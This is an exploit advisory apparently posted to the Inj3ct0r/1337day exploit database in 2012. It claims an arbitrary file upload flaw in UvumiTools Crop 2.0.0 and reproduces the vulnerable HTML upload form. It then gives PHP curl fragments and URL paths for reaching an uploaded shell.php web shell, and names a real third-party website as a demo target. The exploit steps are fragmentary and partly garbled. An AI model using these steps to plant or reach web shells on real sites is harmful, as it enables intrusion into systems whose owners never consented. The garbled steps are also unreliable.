1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1               ==========================================               1
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
1               ==========================================               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|     UvumiTools Crop 2.0.0  - Arbitrary File Upload Vulnerability       |     
--------------------------------------------------------------------------

+----------------| ABOUT ME |--------------------+
NAME:     TAURUS OMAR                            -
HOME:     ACCESOILEGAL.BLOGSPOT.COM              -
TWITTER:  @taurusomar_                           -
E-MAIL:   omar-taurus[at]dragonsecurity[dot]org  -
E-MAIL:   omar-taurus[at]live[dot]com            -
PWNED:    #ZUUU                                  -
+------------------------------------------------+ 

# Exploit Title: UvumiTools Crop 2.0.0  - Arbitrary File Upload Vulnerability 
# Vendor Name: UvumiTools
# Url Vendor: http://uvumitools.com/
# Category:: WebApps  
# Dork: N/A
# 0day exploits : 1337day.com Inj3ct0r Exploit DataBase   

# Vulnerability Code

<div>
<form id="formula" method="post" enctype="multipart/form-data" action="">
<input type="hidden" name="accion" value="subir" />
<input type="hidden" name="uniqid" value="" />
<input type="hidden" name="carpeta" value="" />
<input type="hidden" name="id_padre" value="0" />
Subir imagen: <input type="file" id="imagen_file" name="imagen" /> 
<input type="button" onclick="subir()" value="Subir" class="button" />
</form>
<input id="imagen" type="hidden" value="" />
<input id="publico_top" name="publico_top" type="hidden" />
<input id="publico_left" name="publico_left" type="hidden" />
<input id="publico_width" name="publico_width" type="hidden" />
<input id="publico_height" name="publico_height" type="hidden" />
<input id="thumbnail_top" name="thumbnail_top" type="hidden" />
<input id="thumbnail_left" name="thumbnail_left" type="hidden" />
<input id="thumbnail_width" name="thumbnail_width" type="hidden" />
<input id="thumbnail_height" name="thumbnail_height" type="hidden" />
<hr style="margin-top:10px;" />
<input type="button" value="Cancelar" class="button" onclick="parent.MochaUI.closeWindow(parent.$('winSubirImagen2'));" />
</div>

# Input
$ch = curl_init("http://site.com/admin/imagen/imagenes/shell.php")

# Output
$ch = curl_init("http://site.com/admin/imagen/imagenes/muestra/shell.php") or $ch = curl_init("http://site.com//old/images/shell.php")

# Access_Shell 
http://site.com/admin/imagen/imagenes/muestra/shell.php or http://site.com//old/images/shell.php


# Simple_Demo
http://www.provexfontecilla.cl/admin/marcas/imagen/

# 1337day.com [2012-10-14]